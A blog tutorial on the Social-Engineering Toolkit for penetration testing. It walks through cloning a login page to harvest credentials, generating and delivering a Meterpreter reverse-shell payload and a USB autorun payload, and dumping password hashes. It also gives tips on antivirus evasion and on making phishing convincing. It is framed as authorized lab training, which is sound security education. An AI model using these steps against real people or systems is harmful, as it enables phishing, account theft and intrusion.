Social-Engineering Toolkit (SET): for Penetration Testing

byEngr. M.A. Rashid Rony
0

Professional Tutorial on Social-Engineering Toolkit (SET): for Penetration Testing

Introduction

The Social-Engineering Toolkit (SET) is an open-source framework designed to facilitate social engineering attacks, enabling penetration testers to simulate real-world threats like phishing, credential harvesting, and malicious payload delivery. Developed by David Kennedy (ReL1K) of TrustedSec, SET integrates seamlessly with the Metasploit Framework to automate attack vectors such as website cloning, spear-phishing, and USB-based exploitation. Social engineering exploits human vulnerabilities, making SET a critical tool for testing organizational security awareness.

This tutorial provides a detailed guide on using SET for ethical penetration testing, covering installation, key features, usage, and a practical example of a phishing attack. Aimed at intermediate pentesters, it assumes familiarity with Linux, networking, and Metasploit basics (as covered in prior tutorials). All activities must be conducted in authorized lab environments (e.g., Web Security Academy, Hack The Box, TryHackMe) to comply with legal and ethical standards. Unauthorized use is illegal and unethical.

This guide draws from TrustedSec’s documentation, community resources, and aligns with your interest in comprehensive tutorials for penetration testing tools.

What is the Social-Engineering Toolkit (SET)?

SET is a Python-based framework that automates social engineering attacks, leveraging human trust to gain unauthorized access to systems or data. It includes modules for phishing, website cloning, infectious media generation, and more, often paired with Metasploit payloads for exploitation. SET is particularly effective for testing user susceptibility to phishing emails, fake websites, or malicious files.

Key Features

  • Spear-Phishing Attacks: Sends targeted phishing emails with malicious attachments or links.
  • Website Attack Vectors: Clones login pages to harvest credentials or deliver payloads.
  • Infectious Media Generator: Creates malicious USB or CDROM AutoRun files.
  • Payload Integration: Uses Metasploit payloads (e.g., Meterpreter) for exploitation.
  • Multi-Attack Vectors: Combines phishing, web, and client-side attacks.
  • Cross-Platform Support: Targets Windows, Linux, macOS, and Android.
  • Customizable Templates: Supports custom email and website templates for realistic attacks.
  • Automation: Simplifies complex attack workflows with a menu-driven interface.

System Requirements

  • Operating System: Kali Linux (recommended), Parrot OS, or any Linux distribution with Python and Metasploit.
  • Dependencies: Python 3, Metasploit Framework, and libraries like pycrypto, pyopenssl.
  • Hardware: Minimum 4GB RAM; 8GB+ recommended for Metasploit integration.
  • Network: Stable connection; public IP or port forwarding for external attacks.
  • Lab Setup: Virtual machines (e.g., VirtualBox, VMware) or cloud labs for testing targets.

Installation and Setup

SET is pre-installed on Kali Linux but requires configuration for optimal use. Below are the steps to install and set up SET.

Installation Steps

  1. Update Kali Linux:

sudo apt update && sudo apt upgrade -y

  1. Install SET (if not pre-installed):

sudo apt install setoolkit -y

Alternatively, clone from GitHub:

git clone https://github.com/trustedsec/social-engineer-toolkit.git

cd social-engineer-toolkit

pip3 install -r requirements.txt

python3 setup.py install

  1. Install Metasploit (required for payloads):

4.  sudo apt install metasploit-framework -y

sudo msfdb init

  1. Verify SET Installation:

setoolkit

This launches the SET menu.

  1. Update SET:

7.  cd social-engineer-toolkit

git pull

Troubleshooting

  • Dependency Errors: Install missing Python libraries:

pip3 install pycrypto pyopenssl

  • Metasploit Issues: Ensure PostgreSQL is running (sudo systemctl start postgresql).
  • Permission Errors: Run SET with sudo setoolkit if needed.

SET Usage Guide

SET operates through a menu-driven interface, offering various attack vectors. Below is a detailed overview of its usage.

Launching SET

Start SET:

sudo setoolkit

Output:

[---] The Social-Engineer Toolkit (SET) [---]

[---] Created by: David Kennedy (ReL1K) [---]

[---] Version: 8.0.3 [---]

Select from the menu:

1) Social-Engineering Attacks

2) Penetration Testing (Fast-Track)

3) Third Party Modules

...

Navigate using numbers (e.g., 1 for Social-Engineering Attacks).

Main Menu Options

  • 1. Social-Engineering Attacks:
    • Spear-Phishing Attack Vectors
    • Website Attack Vectors
    • Infectious Media Generator
    • Create a Payload and Listener
  • 2. Penetration Testing (Fast-Track): Automated exploits.
  • 3. Third Party Modules: Community-contributed tools.
  • 99. Exit: Close SET.

Key Attack Vectors

  • Spear-Phishing: Sends emails with malicious attachments or links.
  • Website Attack Vectors:
    • Credential Harvester: Clones login pages to capture credentials.
    • Tabnabbing: Replaces browser tabs with malicious pages.
    • Java Applet Attack: Delivers payloads via Java applets.
  • Infectious Media Generator: Creates malicious USB/CDROM files.
  • Create a Payload and Listener: Generates standalone payloads with Metasploit.

Common Commands

SET automates most tasks through its menu, but you can script actions or integrate with Metasploit:

msfconsole -r /path/to/set_payload.rc

Practical Example: Phishing Attack with Credential Harvesting

This example demonstrates using SET to clone a website’s login page (e.g., a WordPress admin panel) to harvest credentials in a controlled lab environment. Assume the attacker’s Kali Linux IP is 192.168.1.100 and the target is a lab user on a Windows 10 VM (192.168.1.10).

Step 1: Setup

  1. Prepare Environment:
    • Use a Windows 10 VM as the target (VirtualBox or TryHackMe).
    • Ensure Metasploit is running:

o    sudo systemctl start postgresql

msfconsole

  1. Launch SET:

sudo setoolkit

Step 2: Configure Credential Harvester

  1. Select Social-Engineering Attacks (1).
  2. Choose Website Attack Vectors (2).
  3. Select Credential Harvester Attack Method (3).
  4. Choose Site Cloner (2).
  5. Configure:
    • IP for Reverse Connection: 192.168.1.100 (Kali IP).
    • URL to Clone: http://192.168.1.10/wordpress/wp-login.php (lab WordPress login page).
  6. SET starts a local web server to host the cloned page.

Output:

[*] Social-Engineer Toolkit Credential Harvester Attack

[*] Cloning http://192.168.1.10/wordpress/wp-login.php

[*] Web server started on http://192.168.1.100:80

Step 3: Deliver the Phishing Page

  1. Simulate a phishing email:
    • Send a link to http://192.168.1.100 via email or direct the target to it (in a lab, manually visit the URL on the Windows VM).
  2. When the target enters credentials (e.g., admin:password123), SET captures them: Output:

3.  [*] Harvested credentials:

4.  Username: admin

Password: password123

Step 4: Integrate with Metasploit (Optional)

To deliver a payload:

  1. Return to SET’s main menu, select Create a Payload and Listener (4).
  2. Choose Metasploit Windows Reverse TCP Meterpreter (2).
  3. Configure:
    • LHOST: 192.168.1.100
    • LPORT: 4444
    • Output: payload.exe
  4. SET generates payload.exe and a Metasploit resource file.
  5. Start the Metasploit listener:

msfconsole -r /root/set/payload.rc

Output:

[*] Started reverse TCP handler on 192.168.1.100:4444

  1. Deliver payload.exe to the target (e.g., via the cloned website or email attachment).
  2. When executed, Metasploit receives a session:

8.  [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.10:54321)

meterpreter > sysinfo

Output:

Computer    : WIN10-VM

OS          : Windows 10 (Build 19041)

Step 5: Post-Exploitation

Use Meterpreter commands:

  • screenshot: Capture the desktop:

meterpreter > screenshot

Output:

Screenshot saved to: /root/.msf4/screenshots/win10_2025-09-06.png

  • hashdump: Dump password hashes:

meterpreter > hashdump

Practical Example: USB Attack

  1. Select Infectious Media Generator (3) from the main menu.
  2. Choose File-Format Exploits (1).
  3. Select Metasploit Windows Reverse TCP Meterpreter (2).
  4. Configure:
    • LHOST: 192.168.1.100
    • LPORT: 4444
    • Output: autorun.exe
  5. Copy autorun.exe and autorun.inf to a USB drive.
  6. Start the Metasploit listener (as above).
  7. When the USB is inserted into the target VM, it triggers the payload, opening a Meterpreter session.

Best Practices and Tips

  • Ethics and Legality: Obtain explicit permission; test only in lab environments (e.g., TryHackMe, Hack The Box). Unauthorized attacks are illegal.
  • Lab Setup: Use virtual machines (Windows 10, Metasploitable3) or cloud labs to simulate targets.
  • Realism: Customize email templates (/root/set/config/set_config) for convincing phishing campaigns.
  • Integration: Pair with Metasploit (for payloads), msfvenom (for custom payloads), or Burp Suite (for web traffic analysis).
  • Evasion: Use msfvenom’s encoding options or Veil/TheFatRat for undetectable payloads (see prior tutorials).
  • Common Pitfalls:
    • Ensure LHOST is reachable (use public IP or port forwarding for external targets).
    • Test email delivery in a lab to avoid anti-spam filters.
  • Resources:
    • Official Docs: https://github.com/trustedsec/social-engineer-toolkit
    • TryHackMe: “Social Engineering” and “Metasploit” rooms
    • Hack The Box: “Phishing” challenges
    • Web Security Academy: https://portswigger.net/web-security for web attack labs
    • Hackers Arise: https://hackers-arise.com/post/2023/12/31/social-engineering-toolkit

Visual References

SET is a menu-driven tool, so visuals are primarily terminal outputs or cloned web pages. For screenshots:

  • GitHub: https://github.com/trustedsec/social-engineer-toolkit (shows menu and attack outputs).
  • TryHackMe: “Social Engineering” room displays SET menus and credential harvesting.
  • Medium Articles: Search “SEToolkit tutorial” (e.g., https://medium.com/@securitygeek/social-engineering-toolkit-guide) for terminal and phishing page screenshots.
  • Hackers Arise: https://hackers-arise.com/post/2023/12/31/social-engineering-toolkit shows setup and execution.

Conclusion

The Social-Engineering Toolkit (SET) is a powerful ally for penetration testers, enabling realistic simulations of social engineering attacks. By mastering its attack vectors—phishing, website cloning, and infectious media—you can test human vulnerabilities ethically and effectively. Always prioritize legal and authorized testing in lab environments like TryHackMe, Hack The Box, or Web Security Academy to build skills and enhance organizational security.

Author: Engr. M A Rashid Rony
Date: September 6, 2025
For updates, visit: https://github.com/trustedsec/social-engineer-toolkit

 

Tags:

Post a Comment

Previous Post Next Post